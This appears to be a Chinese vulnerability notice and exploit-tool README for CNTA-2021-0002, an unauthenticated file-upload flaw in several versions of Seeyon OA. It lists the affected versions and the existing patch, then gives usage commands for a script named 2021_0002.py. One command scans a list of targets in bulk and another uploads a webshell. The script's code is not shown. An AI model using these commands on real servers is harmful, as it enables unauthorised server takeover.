由于致远OA旧版本某些接口存在未授权访问,以及部分函数存在过滤不足,攻击者通过构造恶意请求,可在无需登录的情况下上传恶意脚本文件,从而控制服务器。该漏洞的利用代码(POC)周末已在互联网上公开,致远OA官方已针对该漏洞提供补丁。
致远OA是一套办公协同软件。
CNTA-2021-0002
致远 OA V8.0
致远 OA V7.1、V7.1SP1
致远 OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3
致远 OA V6.0、V6.1SP1、V6.1SP2
致远 OA V5.x
严重
致远OA官方已发布补丁完成漏洞修复:
python3 2021_0002.py --url http://127.0.0.1:1111 单独检测url是否存在漏洞
python3 2021_0002.py --file target.txt批量检测目标是否存在漏洞
python3 2021_0002.py --shell http://127.0.0.1:1111 向目标中上传webshell
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。